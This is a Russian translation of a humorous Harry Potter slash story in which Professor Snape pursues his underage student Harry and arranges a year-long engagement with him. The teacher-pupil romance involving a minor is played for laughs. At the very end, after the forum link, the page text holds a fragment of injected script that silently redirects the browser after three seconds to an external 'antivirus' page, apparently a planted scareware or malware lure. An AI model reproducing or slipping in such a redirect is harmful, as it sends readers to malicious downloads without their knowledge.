Пристойное предложение.
A Modest Proposal

Автор: Telanu
Оригинал: здесь
Разрешение на перевод получено.
Переводчик:
Рейтинг:
PG
Герои: Harry/Snape
Категория: слэш
Жанр: Юмор
Краткое
содержание: Иногда людям очень трудно объясниться.

Мысли Гарри Поттера вились вокруг мыслей Северуса Снейпа, переплетались с ними. Если бы все это можно было увидеть со стороны, зрелище напомнило бы вам змею на нагретом солнцем камне.

- Великий Мерлин, - протянул Снейп, не отрываясь от работы над зельем, - вижу, вы, Поттер, прекрасно чувствуете себя в моем мозгу. Я прав?

- Пожалуй, да, - ответил Гарри, не поднимая головы от учебника по зельям – наступила самая горячая пора подготовки к ТРИТОНам. И его сознание пробежалось своими воображаемыми пальцами по знакомым очертаниям разума Снейпа.

Судя по голосу, профессор не сердился. Да и с чего бы ему сердится? За последний год у них вошло в привычку кружиться в сознании друг друга, вынюхивая что-нибудь интересное, как две любопытные собаки в незнакомом месте.

- Знаете, продолжил Снейп, так и не повернувшийся к собеседнику, - мы проводим столько времени в обществе друг друга – не говоря уж о времени, проведенном друг у друга в мыслях – что посторонние могут по ошибке принять нас за супружескую пару. – В его голосе слышалась усмешка.

- Ха - ха, запросто, - рассеянно ответил Гарри, облизал палец и перевернул страницу книги. Воображаемые пальцы исчезли.

Вот теперь Снейп выпрямился, повернулся, и сердито посмотрел на юношу. Но Гарри так и не поднял глаз от книги, по-видимому полностью поглощенный подготовкой к экзаменам. Через несколько секунд Снейп вздохнул, и вернулся к своему зелью, в которое как раз пора было добавить кровь дракона.

Вечером Рон нерешительно спросил. – Гарри? Ведь Сам-Зн… Вольдеморта давно нет. Зачем тогда ты продолжаешь изучать Окклюменцию?

Гермиона кивнула, присоединяясь к вопросу.

- Это очень важно, - ответил Гарри, и это было все, что он хотел сказать по этому поводу.

- Неплохо, - Снейп привалился спиной к стене и пытался отдышаться. Только что Гарри весьма впечатляюще вышвырнул учителя из своего разума. – Вынужден признать, что вы делаете успехи, Поттер. У вас есть все шансы стать специалистом, ни в чем не уступающим мне.

- Спасибо, - Гарри поднялся и отряхнул пыль с брюк. – Я думаю, это наши старые разногласия помогают мне сопротивляться.

- Вот как вы считаете! – Фыркнул Снейп. – Глупости, Поттер. Просто после того, как наши разумы столько времени провели бок о бок, если можно так выразиться, вы поняли, как лучше всего отражать мои атаки – и это единственная причина. Подумайте, ведь даже семейная жизнь не подразумевает столь тесного контакта.

- Возможно, - ответил Гарри, тщательно оттирая краем мантии пятнышко со своей палочки. Потом он все-таки взглянул на Снейпа. – Во вторник в то же время, сэр?

Снейп некоторое время пристально смотрел на Поттера, потом бросил резкое «Да» и вылетел из комнаты.

- Гарри, - прошептала Гермиона, ты опять за свое?

- Что? – Гарри, за секунду до этого смотревший, не отрываясь, в одну точку, заморгал и выпрямился на стуле. Снейп пребывал примерно в том же состоянии – он пристально смотрел куда-то перед собой, наматывая на длинный палец прядь волос и не замечая, что Флитвик, хихикая, посыпает сахаром его ломтик бекона.

Гарри аккуратно прервал контакт. Рон и Гермиона с любопытством наблюдали за возвращением Мастера Зелий в реальность. Снейп тряхнул головой, рявкнул на Флитвика, и потянулся за новым бутербродом. Тогда друзья повернулись к Гарри.

- Как ты можешь… - начал Рон.

- Не будем об этом.  Вот и весь разговор.

- Спасибо, Добби, - сказал Гарри эльфу, убирающему посуду. Занятия Окклюменцией всегда пробуждали у юноши голод. Из коридора донесся шум – Слизеринцы возвращались в подземелья после обеда в Большом Зале. – Люблю пудинг, - сообщил Гарри, проверяя, все ли он убрал в сумку.

Снейп обычно ел мало. – Остается надеяться, что со временем ваши вкусы станут более цивилизованными. – Профессор налил себе бокал вина.

 - Возможно, когда-нибудь и станут, - согласился Гарри. И добродушно добавил. – С вашей помощью, сэр.

- Хм-м-м, - Снейп с повышенным вниманием изучал игру света в бокале красного вина. Он пробежался по сознанию Гарри, но сейчас оно было гладким, как стекло и безупречно заблокированным. – Я не уверен, что имею права давать вам столь личные советы. Критика вкусов и манер поведения за столом по традиции разрешается только родителям. Ну и супругам.

- Ну тогда даже не знаю, - Гарри подхватил сумку и пошел к двери. – В пятницу вечером, да?

Снейп нахмурился. – Поттер

Но дверь уже захлопнулась.

Был замечательный солнечный день, поэтому Гарри, Рон и Гермиона устроились позаниматься на берегу озера, в тени огромного дерева. Черная мантия и зловещая походка Снейпа совершенно не сочетались с весенним голубым небом и легким ветерком, играющим в листьях. Рон заметил его первым.

- Что за черт? – Гарри и Гермиона испуганно подняли головы и тоже начали наблюдать за приближением профессора.

- Гарри, ты не знаешь, что ему надо? – Спросила Гермиона.

- Посмотрим, - очень спокойно ответил Гарри.

- Так ты не знаешь?

- Посмотрим, - повторил Гарри. Снейп тем временем подошел, и теперь возвышался над ними, загораживая солнце. Его лицо побагровело, а руки  были сжаты в кулаки.

- Поттер, - рявкнул он, - нам нужно поговорить!

Гарри, в отличие от Рона и Гермионы, не лежал на траве, а сидел, прислонившись к дереву. Поэтому ему было достаточно только слегка приподнять голову, чтобы вежливо ответить, - да, сэр.

- Желательно наедине!

- Нет, сэр.

- Так что если вы соблаговолите… что вы сказали, Поттер? – У Снейпа раздувались ноздри. Рон и Гермиона, затаив дыхание, наблюдали за Гарри.

- Я сказал «нет, сэр», - повторил Гарри, таким беззаботным голосом, будто они обсуждали погоду. – Так о чем вы хотели поговорить?

- Может мы лучше пойдем, Рон, - пискнула Гермиона.

- Нет, лучше останьтесь, - возразил Гарри, глядя Снейпу в глаза.

- Теперь уж ни за что не уйду, - прошептал Рон, вытаращив глаза.

Снейпа уже трясло от гнева. – Замечательно. – Выдохнул он. – Возможно, это даже к лучшему. Мне даже нравится, что кто-то услышит мои слова. Потому что желаю говорить о вашей инфантильности, Поттер. Вашей инфантильности, вашей  ничтожности, вашей бесчувственности и вашей тупости. Вы неспособны даже сказать простейшее «да» или «нет»!

Рон и Гермиона смотрели на Снейпа, явно подозревая, что профессор сошел с ума. Но Гарри невозмутимо переспросил. – «Да» или «нет» в ответ на что, сэр?

Снейп стиснул зубы. – На этой неделе я заговаривал с вами на интересующую меня тему не менее трех раз, но вы все время предпочитали отшучиваться или прикидываться идиотом. С меня хватит. Если я немедленно не получу ответа на свое предложение, вы никогда, повторяю – НИКОГДА – не сможете шнырять в моем разуме, как невоспитанный сопляк, каким, в сущности, и являетесь. – У Снейпа начал дергаться правый глаз.

- Предложения? – Озадачился Рон.

Гарри потер переносицу. – Я бы не назвал это предложениями, - задумчиво произнес он. – Не было сказано ничего конкретного.

- Подождите-ка, - попыталась встрять Гермиона.

Но Снейп уже кипел от ярости. – Закройте рот, мисс Грейнджер! Поттер

- За что это вы так на нее накинулись? – Нахмурился Гарри.

- …извините, мисс Грейнджер. Поттер! Я не собираюсь продолжать эту дурацкую игру в кошки-мышки. – Снейп направил слегка дрожащий указательный палец прямо в лицо Гарри. – Мы поженимся, как только закончится учебный год! Вы заранее позаботитесь о соответствующей случаю одежде! Вы приложите все усилия к тому, что бы своевременно сдать экзамены, и, кроме того, вы…

- А мне до конца учебного года еще восемнадцати не исполнится, - спокойно напомнил Гарри. Ярость Снейпа улетучилась, как воздух из проколотого воздушного шарика. Некоторое время он смотрел на Гарри, сосредоточенно высчитывая что-то в уме. Рон и Гермиона не смогли бы сейчас вымолвить ни слова, даже если бы от этого зависела их жизнь.

- Помолвка сроком на год, - наконец пришел к какому-то решению Снейп. – Все бумаги мы подпишем сразу после последнего экзамена. К этому времени подготовленные бланки уже будут у меня в кабинете. Осталось две недели, Поттер!

- Вот и прекрасно, - кивнул Гарри. – Я приду. Попробовать не хотите? – Добавил он таким тоном, будто речь шла о выборе первого блюда на обед.

- Мистер Поттер! – Возмутился Снейп. Профессор густо покраснел, потом резко повернулся и молча удалился.

- Увидимся в пятницу, - крикнул вслед ему Гарри.

Рон и Гермиона были похожи на двух обалдевших сусликов. А солнце все также светило, и ветер шелестел в листве. Гарри потянулся и снова уткнулся носом в книгу.

- Гарри, - хрипло окликнул его Рон.

- И не говори, - только сейчас в голосе Гарри зазвучало некоторое раздражение. – Ужасно упрямый тип. Я думал, он сломается недели на две раньше.

С этими словами мистер Поттер улыбнулся и перевернул следующую страницу. 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>